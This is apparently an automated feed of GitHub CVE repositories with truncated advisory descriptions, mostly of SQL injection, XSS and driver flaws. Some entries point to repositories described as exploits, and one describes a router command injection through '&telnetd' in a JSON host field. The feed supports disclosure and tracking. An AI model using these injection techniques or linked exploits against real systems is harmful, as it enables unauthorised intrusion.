**A vulnerability, which was classified as problematic, has been found in foxoverflow MySimplifiedSQL. This issue affects some unknown processing of the file MySimplifiedSQL_Examples.php. The manipulation of the argument FirstName/LastName leads to cross site scripting. The attack may be initiated remotely. The name of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10019](https://github.com/Live-Hack-CVE/CVE-2015-10019) create time: 2023-01-07T11:49:40Z

**A vulnerability classified as critical has been found in Netis Netcore Router. This affects an unknown part. The manipulation leads to use of hard-coded password. It is possible to initiate the attack remotely. The identifier VDB-217593 was assigned to this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25069](https://github.com/Live-Hack-CVE/CVE-2018-25069) create time: 2023-01-07T11:49:44Z

**A vulnerability has been found in jamesmartin Inline SVG up to 1.7.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file lib/inline_svg/action_view/helpers.rb of the component URL Parameter Handler. The manipulation of the argument filename leads to cross site scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36644](https://github.com/Live-Hack-CVE/CVE-2020-36644) create time: 2023-01-07T11:49:28Z

**A vulnerability was found in Netis Netcore Router. It has been rated as problematic. Affected by this issue is some unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to cleartext storage in a file or on disk. Local access is required to approach this attack. The id CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0114](https://github.com/Live-Hack-CVE/CVE-2023-0114) create time: 2023-01-07T11:49:53Z

**A vulnerability was found in Netis Netcore Router. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The associated identifier CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0113](https://github.com/Live-Hack-CVE/CVE-2023-0113) create time: 2023-01-07T11:49:49Z

**no description** : [demetrius-ford/CVE-2018-7600](https://github.com/demetrius-ford/CVE-2018-7600) create time: 2023-01-07T11:08:28Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0112](https://github.com/Live-Hack-CVE/CVE-2023-0112) create time: 2023-01-07T06:23:07Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0111](https://github.com/Live-Hack-CVE/CVE-2023-0111) create time: 2023-01-07T06:23:03Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0110](https://github.com/Live-Hack-CVE/CVE-2023-0110) create time: 2023-01-07T06:22:58Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0108](https://github.com/Live-Hack-CVE/CVE-2023-0108) create time: 2023-01-07T06:22:54Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0107](https://github.com/Live-Hack-CVE/CVE-2023-0107) create time: 2023-01-07T06:22:50Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0106](https://github.com/Live-Hack-CVE/CVE-2023-0106) create time: 2023-01-07T06:22:46Z

**CVE-2021-38003 exploits extracted from https://twitter.com/WhichbufferArda/status/1609604183535284224** : [SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003](https://github.com/SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003) create time: 2023-01-07T06:09:14Z

**CVE-2018-19321** : [nanabingies/CVE-2018-19321](https://github.com/nanabingies/CVE-2018-19321) create time: 2023-01-07T02:45:30Z

**Dell Driver EoP (CVE-2021-21551)** : [nanabingies/CVE-2021-21551](https://github.com/nanabingies/CVE-2021-21551) create time: 2023-01-07T02:42:59Z

**A vulnerability was found in Piwigo-Guest-Book up to 1.3.0. It has been declared as critical. This vulnerability affects unknown code of the file include/guestbook.inc.php of the component Navigation Bar. The manipulation of the argument start leads to sql injection. Upgrading to version 1.3.1 is able to address this i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125053](https://github.com/Live-Hack-CVE/CVE-2014-125053) create time: 2023-01-07T01:51:36Z

**An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur via one of attributes in webmail URLs to execute arbitrary JavaScript code, leading to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45913](https://github.com/Live-Hack-CVE/CVE-2022-45913) create time: 2023-01-07T01:51:48Z

**An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur on the Classic UI login page by injecting arbitrary JavaScript code in the username field. This occurs before the user logs into the system, which means that even if the attacker executes arbitrary JavaScript, they will not get any sensitive infor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45911](https://github.com/Live-Hack-CVE/CVE-2022-45911) create time: 2023-01-07T01:51:44Z

**A vulnerability was found in sheilazpy eShop. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is e096c5849c4dc09e1074104531014a62a5413884. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10008](https://github.com/Live-Hack-CVE/CVE-2013-10008) create time: 2023-01-06T23:40:23Z

**A vulnerability was found in JervenBolleman sparql-identifiers and classified as critical. This issue affects some unknown processing of the file src/main/java/org/identifiers/db/RegistryDao.java. The manipulation leads to sql injection. The name of the patch is 44bb0db91c064e305b192fc73521d1dfd25bde52. It is recommend CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125052](https://github.com/Live-Hack-CVE/CVE-2014-125052) create time: 2023-01-06T23:41:11Z

**A vulnerability has been found in devent globalpom-utils up to 4.5.0 and classified as critical. This vulnerability affects the function createTmpDir of the file globalpomutils-fileresources/src/main/java/com/anrisoftware/globalpom/fileresourcemanager/FileResourceManagerProvider.java. The manipulation leads to insecure CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25068](https://github.com/Live-Hack-CVE/CVE-2018-25068) create time: 2023-01-06T23:41:19Z

**A vulnerability, which was classified as critical, was found in JoomGallery up to 3.3.3. This affects an unknown part of the file administrator/components/com_joomgallery/views/config/tmpl/default.php of the component Image Sort Handler. The manipulation leads to sql injection. Upgrading to version 3.3.4 is able to add CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25067](https://github.com/Live-Hack-CVE/CVE-2018-25067) create time: 2023-01-06T23:41:15Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34683](https://github.com/Live-Hack-CVE/CVE-2022-34683) create time: 2023-01-06T23:41:32Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged regular user can cause a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34682](https://github.com/Live-Hack-CVE/CVE-2022-34682) create time: 2023-01-06T23:41:27Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler, where improper input validation of a display-related data structure may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34681](https://github.com/Live-Hack-CVE/CVE-2022-34681) create time: 2023-01-06T23:41:23Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow in index validation may lead to denial of service, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42256](https://github.com/Live-Hack-CVE/CVE-2022-42256) create time: 2023-01-06T23:40:56Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an out-of-bounds array access may lead to denial of service, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42255](https://github.com/Live-Hack-CVE/CVE-2022-42255) create time: 2023-01-06T23:40:53Z

**Efs Software Easy Chat Server Version 3.1 was discovered to contain a DLL hijacking vulnerability via the component TextShaping.dll. This vulnerability allows attackers to execute arbitrary code via a crafted DLL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44939](https://github.com/Live-Hack-CVE/CVE-2022-44939) create time: 2023-01-06T23:40:48Z

**Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to an Out-of-Bounds Read when when parsing DGN files, which may allow an attacker to crash the product, disclose sensitive information, or execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41613](https://github.com/Live-Hack-CVE/CVE-2022-41613) create time: 2023-01-06T23:40:44Z

**Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to a Stack-Based Buffer Overflow when a malformed design (DGN) file is parsed. This may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40201](https://github.com/Live-Hack-CVE/CVE-2022-40201) create time: 2023-01-06T23:40:40Z

**The signature check in the Nokia ASIK AirScale system module version 474021A.101 can be bypassed allowing an attacker to run modified firmware. This could result in the execution of a malicious kernel, arbitrary programs, or modified Nokia programs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2484](https://github.com/Live-Hack-CVE/CVE-2022-2484) create time: 2023-01-06T23:40:36Z

**The bootloader in the Nokia ASIK AirScale system module (versions 474021A.101 and 474021A.102) loads public keys for firmware verification signature. If an attacker modifies the flash contents to corrupt the keys, secure boot could be permanently disabled on a given device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2483](https://github.com/Live-Hack-CVE/CVE-2022-2483) create time: 2023-01-06T23:40:32Z

**A vulnerability exists in Nokia’s ASIK AirScale system module (versions 474021A.101 and 474021A.102) that could allow an attacker to place a script on the file system accessible from Linux. A script placed in the appropriate place could allow for arbitrary code execution in the bootloader. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2482](https://github.com/Live-Hack-CVE/CVE-2022-2482) create time: 2023-01-06T23:40:27Z

**Cross-site Scripting (XSS) - Stored in GitHub repository linagora/twake prior to 2023.Q1.1200+. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0028](https://github.com/Live-Hack-CVE/CVE-2023-0028) create time: 2023-01-06T23:41:02Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Chris92de AdminServ. It has been rated as problematic. This issue affects some unknown processing of the file resources/core/adminserv.php. The manipulation of the argument error leads to cross site scripting. The attack may be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36638](https://github.com/Live-Hack-CVE/CVE-2020-36638) create time: 2023-01-06T21:32:02Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Chris92de AdminServ. It has been declared as problematic. This vulnerability affects unknown code of the file resources/core/adminserv.php. The manipulation of the argument text leads to cross site scripting. The attack can be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36637](https://github.com/Live-Hack-CVE/CVE-2020-36637) create time: 2023-01-06T21:31:57Z

**A vulnerability was found in OpenShift OSIN. It has been classified as problematic. This affects the function ClientSecretMatches/CheckClientSecret. The manipulation of the argument secret leads to observable timing discrepancy. The name of the patch is 8612686d6dda34ae9ef6b5a974e4b7accb4fea29. It is recommended to app CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4294](https://github.com/Live-Hack-CVE/CVE-2021-4294) create time: 2023-01-06T21:32:17Z

**Insertion of Sensitive Information into Log Files in M-Files Server before 22.10.11846.0 could allow to obtain sensitive tokens from logs, if specific configurations were set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4858](https://github.com/Live-Hack-CVE/CVE-2022-4858) create time: 2023-01-06T21:32:08Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an unhandled return value can lead to a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34679](https://github.com/Live-Hack-CVE/CVE-2022-34679) create time: 2023-01-06T21:31:50Z

**A vulnerability was found in himiklab yii2-jqgrid-widget up to 1.0.7. It has been declared as critical. This vulnerability affects the function addSearchOptionsRecursively of the file JqGridAction.php. The manipulation leads to sql injection. Upgrading to version 1.0.8 is able to address this issue. The name of the pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125051](https://github.com/Live-Hack-CVE/CVE-2014-125051) create time: 2023-01-06T19:21:05Z

**A vulnerability was found in ScottTZhang voter-js and classified as critical. Affected by this issue is some unknown functionality of the file main.js. The manipulation leads to sql injection. The name of the patch is 6317c67a56061aeeaeed3cf9ec665fd9983d8044. It is recommended to apply a patch to fix this issue. VDB-21 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125050](https://github.com/Live-Hack-CVE/CVE-2014-125050) create time: 2023-01-06T19:21:01Z

**A vulnerability was found in challenge website. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is f1644b1d3502e5aa5284f31ea80d2623817f4d42. It is recommended to apply a patch to fix this issue. The identifier VDB-216989 was assig CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20150](https://github.com/Live-Hack-CVE/CVE-2017-20150) create time: 2023-01-06T19:20:17Z

**A vulnerability was found in shred cilla. It has been classified as problematic. Affected is an unknown function of the file cilla-xample/src/main/webapp/WEB-INF/jsp/view/search.jsp of the component Search Handler. The manipulation of the argument details leads to cross site scripting. It is possible to launch the atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25054](https://github.com/Live-Hack-CVE/CVE-2018-25054) create time: 2023-01-06T19:20:30Z

**A vulnerability classified as problematic was found in Nakiami Mellivora up to 2.1.x. Affected by this vulnerability is the function print_user_ip_log of the file include/layout/user.inc.php of the component Admin Panel. The manipulation of the argument $entry['ip'] leads to cross site scripting. The attack can be laun CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25092](https://github.com/Live-Hack-CVE/CVE-2019-25092) create time: 2023-01-06T19:20:26Z

**A vulnerability was found in intgr uqm-wasm. It has been classified as critical. This affects the function log_displayBox in the library sc2/src/libs/log/msgbox_macosx.m. The manipulation leads to format string. The name of the patch is 1d5cbf3350a02c423ad6bef6dfd5300d38aa828f. It is recommended to apply a patch to fix CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36643](https://github.com/Live-Hack-CVE/CVE-2020-36643) create time: 2023-01-06T19:21:10Z

**Due to unchecked type assertions, maliciously crafted messages can cause panics, which may be used as a denial of service vector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36562](https://github.com/Live-Hack-CVE/CVE-2020-36562) create time: 2023-01-06T19:20:57Z

**XML Digital Signatures generated and validated using this package use SHA-1, which may allow an attacker to craft inputs which cause hash collisions depending on their control over the input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36563](https://github.com/Live-Hack-CVE/CVE-2020-36563) create time: 2023-01-06T19:20:44Z

**PO Exploit for CVE-2022-44149** : [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149) create time: 2023-01-06T20:00:25Z

**StreamX applications from versions 6.02.01 to 6.04.34 are affected by a path traversal vulnerability that allows authenticated users to get unauthorized access to files on the server's filesystem. StreamX applications using StreamView HTML component with the public web server feature activated are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4778](https://github.com/Live-Hack-CVE/CVE-2022-4778) create time: 2023-01-06T19:21:28Z

**XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41966](https://github.com/Live-Hack-CVE/CVE-2022-41966) create time: 2023-01-06T19:21:24Z

**The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44149](https://github.com/Live-Hack-CVE/CVE-2022-44149) create time: 2023-01-06T19:21:14Z

**authentik is an open-source Identity provider focused on flexibility and versatility. In versions prior to 2022.10.4, and 2022.11.4, any authenticated user can create an arbitrary number of accounts through the default flows. This would circumvent any policy in a situation where it is undesirable for users to create ne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46172](https://github.com/Live-Hack-CVE/CVE-2022-46172) create time: 2023-01-06T19:20:53Z

**Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML `SNAPSHOT` versions are being resolved, this vulnerabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41967](https://github.com/Live-Hack-CVE/CVE-2022-41967) create time: 2023-01-06T19:20:49Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in cloudsync. Affected by this vulnerability is the function getItem of the file src/main/java/cloudsync/connector/LocalFilesystemConnector.java. The manipulation leads to path traversal. It is possible t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4773](https://github.com/Live-Hack-CVE/CVE-2022-4773) create time: 2023-01-06T19:20:40Z

**StreamX applications from versions 6.02.01 to 6.04.34 are affected by a logic bug that allows to bypass the implemented authentication scheme. StreamX applications using StreamView HTML component with the public web server feature activated are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4779](https://github.com/Live-Hack-CVE/CVE-2022-4779) create time: 2023-01-06T19:20:34Z

**A vulnerability was found in centic9 jgit-cookbook. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to insecure temporary file. The attack can be initiated remotely. The name of the patch is b8cb29b43dc704708d598c60ac1881db7cf8e9c3. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4817](https://github.com/Live-Hack-CVE/CVE-2022-4817) create time: 2023-01-06T19:20:21Z

**authentik is an open-source Identity Provider focused on flexibility and versatility. Versions prior to 2022.11.4 and 2022.10.4 are vulnerable to Improper Authentication. Token reuse in invitation URLs leads to access control bypass via the use of a different enrollment flow than in the one provided. The vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23555](https://github.com/Live-Hack-CVE/CVE-2022-23555) create time: 2023-01-06T19:20:12Z

**A vulnerability, which was classified as problematic, was found in InSTEDD Nuntium. Affected is an unknown function of the file app/controllers/geopoll_controller.rb. The manipulation of the argument signature leads to observable timing discrepancy. It is possible to launch the attack remotely. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4823](https://github.com/Live-Hack-CVE/CVE-2022-4823) create time: 2023-01-06T19:20:08Z

**A vulnerability was found in KBase Metrics. It has been classified as critical. This affects the function upload_user_data of the file source/daily_cron_jobs/methods_upload_user_stats.py. The manipulation leads to sql injection. The name of the patch is 959dfb6b05991e30b0fa972a1ecdcaae8e1dae6d. It is recommended to app CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4860](https://github.com/Live-Hack-CVE/CVE-2022-4860) create time: 2023-01-06T19:20:04Z

**Incorrect implementation in authentication protocol in M-Files Client before 22.5.11356.0 allows high privileged user to get other users tokens to another resource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4861](https://github.com/Live-Hack-CVE/CVE-2022-4861) create time: 2023-01-06T19:20:00Z

**Canarytokens is an open source tool which helps track activity and actions on your network. A Cross-Site Scripting vulnerability was identified in the history page of triggered Canarytokens prior to sha-fb61290. An attacker who discovers an HTTP-based Canarytoken (a URL) can use this to execute Javascript in the Canary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22475](https://github.com/Live-Hack-CVE/CVE-2023-22475) create time: 2023-01-06T19:21:19Z

**Exploit for WP BookingPress (< 1.0.11) based on destr4ct POC.** : [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739) create time: 2023-01-06T19:07:11Z

**CSRF tokens are generated using math/rand, which is not a cryptographically secure rander number generation, making predicting their values relatively trivial and allowing an attacker to bypass CSRF protections which relatively few requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15005](https://github.com/Live-Hack-CVE/CVE-2016-15005) create time: 2023-01-06T18:14:27Z

**Usage of the CORS handler may apply improper CORS headers, allowing the requester to explicitly control the value of the Access-Control-Allow-Origin header, which bypasses the expected behavior of the Same Origin Policy. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20146](https://github.com/Live-Hack-CVE/CVE-2017-20146) create time: 2023-01-06T18:14:22Z

**Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25046](https://github.com/Live-Hack-CVE/CVE-2018-25046) create time: 2023-01-06T18:14:17Z

**A vulnerability, which was classified as problematic, has been found in Harvest Chosen up to 1.8.6. Affected by this issue is the function AbstractChosen of the file coffee/lib/abstract-chosen.coffee. The manipulation of the argument group_label leads to cross site scripting. The attack may be launched remotely. Upgrad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25050](https://github.com/Live-Hack-CVE/CVE-2018-25050) create time: 2023-01-06T18:13:56Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5325](https://github.com/Live-Hack-CVE/CVE-2019-5325) create time: 2023-01-06T18:14:40Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5316](https://github.com/Live-Hack-CVE/CVE-2019-5316) create time: 2023-01-06T18:14:35Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5313](https://github.com/Live-Hack-CVE/CVE-2019-5313) create time: 2023-01-06T18:14:31Z

**A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without 'httponly' flag. It is possible to initiate the attack rem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25091](https://github.com/Live-Hack-CVE/CVE-2019-25091) create time: 2023-01-06T18:14:13Z

**Due to support of Gzip compression in request bodies, as well as a lack of limiting response body sizes, a malicious server can cause a client to consume a significant amount of system resources, which may be used as a denial of service vector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25072](https://github.com/Live-Hack-CVE/CVE-2019-25072) create time: 2023-01-06T18:14:05Z

**Improper path santiziation in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25073](https://github.com/Live-Hack-CVE/CVE-2019-25073) create time: 2023-01-06T18:13:51Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7118](https://github.com/Live-Hack-CVE/CVE-2020-7118) create time: 2023-01-06T18:15:05Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7112](https://github.com/Live-Hack-CVE/CVE-2020-7112) create time: 2023-01-06T18:15:01Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24645](https://github.com/Live-Hack-CVE/CVE-2020-24645) create time: 2023-01-06T18:14:57Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24644](https://github.com/Live-Hack-CVE/CVE-2020-24644) create time: 2023-01-06T18:14:52Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24643](https://github.com/Live-Hack-CVE/CVE-2020-24643) create time: 2023-01-06T18:14:48Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24642](https://github.com/Live-Hack-CVE/CVE-2020-24642) create time: 2023-01-06T18:14:43Z

**Due to improper santization of user input, HTTPEngine.Handle allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36559](https://github.com/Live-Hack-CVE/CVE-2020-36559) create time: 2023-01-06T18:13:47Z

**A vulnerability, which was classified as problematic, has been found in w3c Unicorn. This issue affects the function ValidatorNuMessage of the file src/org/w3c/unicorn/response/impl/ValidatorNuMessage.java. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4296](https://github.com/Live-Hack-CVE/CVE-2021-4296) create time: 2023-01-06T18:14:08Z

**A vulnerability classified as problematic was found in ONC code-validator-api up to 1.0.30. This vulnerability affects the function vocabularyValidationConfigurations of the file src/main/java/org/sitenv/vocabularies/configuration/CodeValidatorApiConfiguration.java of the component XML Handler. The manipulation leads t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4295](https://github.com/Live-Hack-CVE/CVE-2021-4295) create time: 2023-01-06T18:14:00Z

**CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution** : [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE) create time: 2023-01-06T16:53:51Z

**The RemoteAddr and LocalAddr methods on the returned net.Conn may call themselves, leading to an infinite loop which will crash the program due to a stack overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10005](https://github.com/Live-Hack-CVE/CVE-2013-10005) create time: 2023-01-06T16:02:20Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in typcn Blogile. Affected is the function getNav of the file server.js. The manipulation of the argument query leads to sql injection. The name of the patch is cfec31043b562ffefe29fe01af6d3c5ed1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125049](https://github.com/Live-Hack-CVE/CVE-2014-125049) create time: 2023-01-06T16:02:59Z

**A vulnerability, which was classified as critical, has been found in kassi xingwall. This issue affects some unknown processing of the file app/controllers/oauth.js. The manipulation leads to session fixiation. The name of the patch is e9f0d509e1408743048e29d9c099d36e0e1f6ae7. It is recommended to apply a patch to fix CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125048](https://github.com/Live-Hack-CVE/CVE-2014-125048) create time: 2023-01-06T16:02:54Z

**A vulnerability has been found in DBRisinajumi d2files and classified as critical. Affected by this vulnerability is the function actionUpload/actionDownloadFile of the file controllers/D2filesController.php. The manipulation leads to sql injection. Upgrading to version 1.0.0 is able to address this issue. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10018](https://github.com/Live-Hack-CVE/CVE-2015-10018) create time: 2023-01-06T16:03:03Z

**A vulnerability was found in simple_php_link_shortener. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument $link["id"] leads to sql injection. The name of the patch is b26ac6480761635ed94ccb0222ba6b732de6e53f. It is recommended to apply a patch to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25057](https://github.com/Live-Hack-CVE/CVE-2018-25057) create time: 2023-01-06T16:02:47Z

**A vulnerability classified as critical was found in Arthmoor QSF-Portal. This vulnerability affects unknown code of the file index.php. The manipulation of the argument a leads to path traversal. The name of the patch is ea4f61e23ecb83247d174bc2e2cbab521c751a7d. It is recommended to apply a patch to fix this issue. VDB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25099](https://github.com/Live-Hack-CVE/CVE-2019-25099) create time: 2023-01-06T16:03:08Z

**Unsanitized input in the default logger in github.com/gin-gonic/gin before v1.6.0 allows remote attackers to inject arbitrary log lines. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36567](https://github.com/Live-Hack-CVE/CVE-2020-36567) create time: 2023-01-06T16:02:25Z

**A remote code execution vulnerability exists in Rockwell Automation Studio 5000 Logix Emulate software. Users are granted elevated permissions on certain product services when the software is installed. Due to this misconfiguration, a malicious user could potentially achieve remote code execution on the targeted softwa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3156](https://github.com/Live-Hack-CVE/CVE-2022-3156) create time: 2023-01-06T16:02:29Z

**A vulnerability classified as critical has been found in tbezman school-store. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is 2957fc97054216d3a393f1775efd01ae2b072001. It is recommended to apply a patch to fix this issue. The identifier VDB-217557 was assigned to this vu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125047](https://github.com/Live-Hack-CVE/CVE-2014-125047) create time: 2023-01-06T13:51:40Z

**A vulnerability has been found in HPI-Information-Systems ProLOD and classified as critical. This vulnerability affects unknown code. The manipulation of the argument this leads to sql injection. The name of the patch is 3f710905458d49c77530bd3cbcd8960457566b73. It is recommended to apply a patch to fix this issue. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10017](https://github.com/Live-Hack-CVE/CVE-2015-10017) create time: 2023-01-06T13:51:44Z

